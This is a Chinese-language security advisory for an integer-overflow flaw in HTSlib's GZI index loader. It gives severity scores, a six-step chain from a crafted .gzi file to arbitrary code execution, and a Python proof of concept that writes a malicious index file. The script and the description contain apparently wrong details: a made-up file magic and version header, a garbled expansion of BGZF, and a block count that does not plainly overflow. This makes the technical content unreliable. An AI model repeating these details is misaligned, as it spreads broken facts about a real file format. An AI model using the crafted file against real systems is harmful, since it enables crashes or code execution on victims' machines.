CVE-2026-31970 HTSlib GZI索引加载整数溢出漏洞

漏洞信息

漏洞编号

CVE-2026-31970

漏洞类型

整数溢出/堆缓冲区溢出

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

HTSlib (samtools)

漏洞概述

HTSlib是一个用于读写生物信息学文件格式的C语言库。漏洞存在于GZI（Generalized Zip Index）索引文件的加载函数`bgzf_index_load_hfile()`中，攻击者可以通过构造恶意`.gzi`索引文件触发整数溢出。当函数执行时，溢出会导致分配一个过小或为零大小的缓冲区用于存储索引数据。随后向该缓冲区写入十六个零字节，如果溢出导致其他文件数据被加载到缓冲区中，函数会因读取的记录数不符合预期而失败，并尝试释放溢出的堆缓冲区。该漏洞可导致堆缓冲区溢出，攻击者可能利用此漏洞使程序崩溃、覆盖堆数据或获取任意代码执行。攻击需要用户交互打开特制的文件。

技术细节

漏洞根源在于HTSlib的`bgzf_index_load_hfile()`函数在处理GZI索引文件时缺乏整数溢出检查。GZI文件用于索引BGZF（Block-Ganged Binary GZIP）压缩文件。当函数解析索引时，攻击者可以通过精心构造的GZI文件使某个长度计算发生整数溢出。例如，当计算所需缓冲区大小时，恶意输入可能导致计算结果回绕为一个极小的值或零。分配的缓冲区过小但后续代码仍尝试向其中写入数据，导致堆缓冲区溢出。攻击者可通过控制GZI文件内容来控制溢出的大小和写入的数据。在某些情况下，函数可能尝试将超过预期的文件数据加载到缓冲区中，最终导致堆损坏。成功利用此漏洞可实现任意代码执行。

攻击链分析

STEP 1

步骤1

攻击者创建恶意GZI索引文件，精心构造block_count值使其与entry大小相乘时发生整数溢出

STEP 2

步骤2

受害者使用存在漏洞的HTSlib版本打开包含恶意GZI文件的BGZF压缩数据

STEP 3

步骤3

HTSlib调用bgzf_index_load_hfile()函数加载GZI索引

STEP 4

步骤4

函数计算缓冲区大小时发生整数溢出，分配过小或零大小的堆缓冲区

STEP 5

步骤5

函数尝试向过小的缓冲区写入数据，导致堆缓冲区溢出

STEP 6

步骤6

攻击者利用堆溢出覆盖关键数据结构，最终实现任意代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-31970 PoC - HTSlib GZI Integer Overflow
This PoC generates a malicious GZI file that triggers integer overflow
in bgzf_index_load_hfile() function.
Note: This is a conceptual PoC for demonstration purposes.
"""
import struct
import sys

def create_malicious_gzi():
    """
    Create a malicious GZI file that triggers integer overflow.
    The overflow occurs when the index loading function calculates
    buffer size without proper overflow checks.
    """
    # GZI file header format:
    # magic (4 bytes) + version (4 bytes) + num_blocks (8 bytes)
    # + block offsets and sizes
    
    # Crafted data that triggers integer overflow
    # When num_blocks * sizeof(entry) overflows, buffer will be undersized
    malicious_data = bytearray()
    
    # GZI magic number
    malicious_data += b'GZI\x00'
    
    # Version
    malicious_data += struct.pack('<I', 1)
    
    # Crafted block count that causes overflow when multiplied
    # Using a value that when multiplied by entry size (16 or 24 bytes)
    # wraps around to a small number
    block_count = 0x10000001  # This will overflow when calculating buffer size
    malicious_data += struct.pack('<Q', block_count)
    
    # Write malicious GZI file
    with open('malicious.gzi', 'wb') as f:
        f.write(malicious_data)
    
    print(f"[+] Created malicious GZI file with block_count={hex(block_count)}")
    print(f"[+] When block_count * sizeof(entry) overflows, buffer will be too small")

if __name__ == '__main__':
    create_malicious_gzi()
    print("[+] PoC generated. Use with vulnerable HTSlib version.")

影响范围

HTSlib < 1.21.1

HTSlib < 1.22.2

HTSlib < 1.23.1

防御指南

临时缓解措施

不要打开来自不可信来源的.gzi索引文件，使用bgzip -r选项重新生成索引文件。在处理来自外部的生物信息学数据时，始终验证数据来源的可信度。